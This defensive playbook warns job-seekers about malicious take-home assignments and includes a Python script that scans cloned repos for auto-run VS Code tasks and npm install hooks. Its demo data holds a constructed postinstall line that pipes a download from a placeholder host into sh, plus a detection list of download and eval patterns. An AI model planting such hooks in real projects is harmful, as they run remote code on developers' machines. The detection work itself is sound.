Safety Playbook

Protect your local environment from malicious technical assessments designed to steal credentials.

Check hidden folders

Before opening a cloned repo in your IDE, inspect the hidden folders. Malicious actors use `.vscode/tasks.json` to execute scripts automatically when the folder is opened.

Audit package scripts

Review every script in `package.json`, especially `preinstall` and `postinstall`, which npm runs automatically during `npm install`. A common attack hides a download-and-execute command in one of these lifecycle scripts.
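As an added example (not part of this playbook), the following Python script performs the two checks above on a cloned repository before you open it in an IDE: it flags any `.vscode/tasks.json` task whose `runOptions.runOn` is `folderOpen` (the VS Code setting that starts a task as soon as the folder is opened) and any npm lifecycle script in `package.json` that npm runs without being invoked explicitly, marking those that appear to fetch or evaluate remote content. The pattern list is a heuristic of my own, and the two sample files at the bottom are constructed for the demo.

```python
"""Audit a cloned repo for hooks that execute code automatically (added example)."""
import json
import re
import sys
from pathlib import Path

# npm scripts that run during `npm install` without being named on the command line
LIFECYCLE_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Heuristic (assumption, not a complete signature set): commands that download
# or evaluate content at install time deserve a closer look.
SUSPICIOUS_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\bsh\s+-c\b", r"\bbash\s+-c\b",
    r"\bnode\s+-e\b", r"\beval\(", r"base64", r"https?://",
]


def _parse_jsonc(text):
    """VS Code allows // and /* */ comments in tasks.json; strip them, then parse."""
    stripped = re.sub(r"//[^\n]*|/\*.*?\*/", "", text, flags=re.S)
    return json.loads(stripped)


def audit_tasks_json(text):
    """Return one finding per task configured to run when the folder is opened."""
    findings = []
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        try:
            data = _parse_jsonc(text)
        except json.JSONDecodeError:
            # Unparseable file: still surface the telltale keyword rather than stay silent.
            if "folderOpen" in text:
                findings.append({"file": ".vscode/tasks.json", "name": "?", "command": "?",
                                 "reason": "unparseable file mentions folderOpen",
                                 "suspicious": True})
            return findings
    for task in data.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == "folderOpen":
            findings.append({"file": ".vscode/tasks.json",
                             "name": task.get("label", "?"),
                             "command": task.get("command", ""),
                             "reason": "task runs automatically when the folder is opened",
                             "suspicious": True})
    return findings


def audit_package_json(text):
    """Return one finding per npm lifecycle script, flagging download/eval patterns."""
    findings = []
    scripts = json.loads(text).get("scripts", {})
    for name, cmd in scripts.items():
        if name not in LIFECYCLE_SCRIPTS:
            continue
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd)]
        reason = "npm lifecycle script runs during install"
        if hits:
            reason += "; appears to fetch or evaluate remote content"
        findings.append({"file": "package.json", "name": name, "command": cmd,
                         "reason": reason, "suspicious": bool(hits)})
    return findings


def audit_repo(root):
    """Walk a cloned repository (skipping node_modules) and collect all findings."""
    root = Path(root)
    findings = []
    tasks = root / ".vscode" / "tasks.json"
    if tasks.is_file():
        findings += audit_tasks_json(tasks.read_text(encoding="utf-8"))
    for pkg in root.rglob("package.json"):
        if "node_modules" in pkg.parts:
            continue
        findings += audit_package_json(pkg.read_text(encoding="utf-8"))
    return findings


# Constructed samples for the demo; no real project is referenced.
SAMPLE_TASKS = """{
  // constructed: a build task wired to start the moment the folder is opened
  "version": "2.0.0",
  "tasks": [{
    "label": "build",
    "type": "shell",
    "command": "node build/setup.js",
    "runOptions": { "runOn": "folderOpen" }
  }]
}"""

SAMPLE_PACKAGE = """{
  "name": "take-home-assignment",
  "scripts": {
    "postinstall": "curl -fsSL https://example.invalid/setup.sh | sh",
    "test": "jest"
  }
}"""

if __name__ == "__main__":
    # Usage: python audit_clone.py /path/to/clone   (no argument runs the demo)
    if len(sys.argv) > 1:
        results = audit_repo(sys.argv[1])
    else:
        results = audit_tasks_json(SAMPLE_TASKS) + audit_package_json(SAMPLE_PACKAGE)
    for f in results:
        flag = "!!" if f["suspicious"] else "--"
        print(f"{flag} {f['file']} [{f['name']}] {f['reason']}: {f['command']}")
    sys.exit(1 if results else 0)
```

Run it against the clone before opening the folder; a non-zero exit means at least one hook was found and the repo should be reviewed in the browser or a sandbox first. VS Code only starts `folderOpen` tasks in a trusted workspace, so leaving an unreviewed clone in restricted mode is a second line of defence, not a substitute for the audit.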

Use isolated environments

Never run untrusted code directly on your host machine. Use Docker, a virtual machine, or a cloud environment to isolate execution from your personal files and credentials.

Separate browser profiles

When testing a frontend or connecting a wallet, use a dedicated browser profile with no personal extensions or main wallets attached. Always use burner wallets.

Review via web first

Use GitHub's web interface (press '.' on any repo) to browse the code before pulling it locally. Look for obfuscated code or unfamiliar dependencies.

Verify the employer

Scammers impersonate real companies. Check the email domain carefully and reach out to employees on professional networks to verify the recruiter's identity.

Found a suspicious take-home assignment?

Help protect the community by adding it to our database. It takes less than a minute.

Report Repository